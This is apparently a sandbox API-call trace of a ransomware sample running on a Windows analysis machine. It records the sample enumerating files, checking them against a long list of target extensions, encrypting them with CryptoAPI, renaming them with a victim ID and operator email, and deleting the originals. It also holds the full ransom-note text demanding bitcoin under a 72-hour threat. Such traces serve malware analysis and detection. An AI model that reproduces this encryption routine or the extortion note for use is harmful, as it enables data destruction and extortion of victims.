	[0201.662] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf")) returned 0
	[0201.662] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x232f1e10, ftCreationTime.dwHighDateTime=0x1d96a62, ftLastAccessTime.dwLowDateTime=0xc32dd010, ftLastAccessTime.dwHighDateTime=0x1d97560, ftLastWriteTime.dwLowDateTime=0xc32dd010, ftLastWriteTime.dwHighDateTime=0x1d97560, nFileSizeHigh=0x0, nFileSizeLow=0x8197, dwReserved0=0x0, dwReserved1=0x0, cFileName="fVWV8R1sa5k.swf", cAlternateFileName="FVWV8R~1.SWF")) returned 1
	[0201.662] lstrcmpW (lpString1="fVWV8R1sa5k.swf", lpString2="..") returned 1
	[0201.662] lstrcmpW (lpString1="fVWV8R1sa5k.swf", lpString2=".") returned 1
	[0201.662] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.662] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\", lpString2="fVWV8R1sa5k.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\fVWV8R1sa5k.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\fVWV8R1sa5k.swf"
	[0201.662] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\fVWV8R1sa5k.swf") returned 90
	[0201.663] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.663] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\fVWV8R1sa5k.swf", cchLength=0x5a | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf") returned 0x5a
	[0201.663] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.663] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.663] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf"
	[0201.663] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf") returned 90
	[0201.663] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.664] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.664] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.664] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.664] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.665] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.665] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0201.668] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x8197, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0x8197, lpOverlapped=0x0) returned 1
	[0201.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.671] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb3b8) returned 1
	[0201.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.674] CryptCreateHash (in: hProv=0xfcb3b8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0201.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.674] CryptHashData (hHash=0xfb93f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.674] CryptDeriveKey (in: hProv=0xfcb3b8, Algid=0x6610, hBaseData=0xfb93f0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb90f0) returned 1
	[0201.674] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.674] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x8197, dwBufLen=0x8197 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x81a0) returned 1
	[0201.675] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.675] RtlMoveMemory (in: Destination=0xfe9340, Source=0xfe11a0, Length=0x8197 | out: Destination=0xfe9340) 
	[0201.675] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.676] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9340*, pdwDataLen=0x1894dc*=0x8197, dwBufLen=0x81a0 | out: pbData=0xfe9340*, pdwDataLen=0x1894dc*=0x81a0) returned 1
	[0201.677] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.678] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0201.678] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.678] CryptDestroyHash (hHash=0xfb93f0) returned 1
	[0201.678] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.678] CryptReleaseContext (hProv=0xfcb3b8, dwFlags=0x0) returned 1
	[0201.678] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.679] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.679] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0201.680] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 132
	[0201.681] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.681] WriteFile (in: hFile=0x32c, lpBuffer=0xfe9340*, nNumberOfBytesToWrite=0x81a0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe9340*, lpNumberOfBytesWritten=0x189938*=0x81a0, lpOverlapped=0x0) returned 1
	[0201.685] CloseHandle (hObject=0x32c) returned 1
	[0201.685] CloseHandle (hObject=0x390) returned 1
	[0201.686] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf")) returned 1
	[0201.732] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\fvwv8r1sa5k.swf")) returned 0
	[0201.732] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x232f1e10, ftCreationTime.dwHighDateTime=0x1d96a62, ftLastAccessTime.dwLowDateTime=0xc32dd010, ftLastAccessTime.dwHighDateTime=0x1d97560, ftLastWriteTime.dwLowDateTime=0xc32dd010, ftLastWriteTime.dwHighDateTime=0x1d97560, nFileSizeHigh=0x0, nFileSizeLow=0x8197, dwReserved0=0x0, dwReserved1=0x0, cFileName="fVWV8R1sa5k.swf", cAlternateFileName="FVWV8R~1.SWF")) returned 0
	[0201.732] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0201.733] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0201.733] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2"
	[0201.733] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\*.*"
	[0201.733] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.734] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.734] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.TXT") returned 102
	[0201.734] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0201.735] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0201.735] WriteFile (in: hFile=0x388, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0201.738] CloseHandle (hObject=0x388) returned 1
	[0201.738] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.739] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0201.740] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0201.740] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0201.740] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0201.741] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0201.741] WriteFile (in: hFile=0x388, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0201.741] CloseHandle (hObject=0x388) returned 1
	[0201.741] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.741] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.742] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0201.742] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.HTML") returned 103
	[0201.742] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0201.742] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with 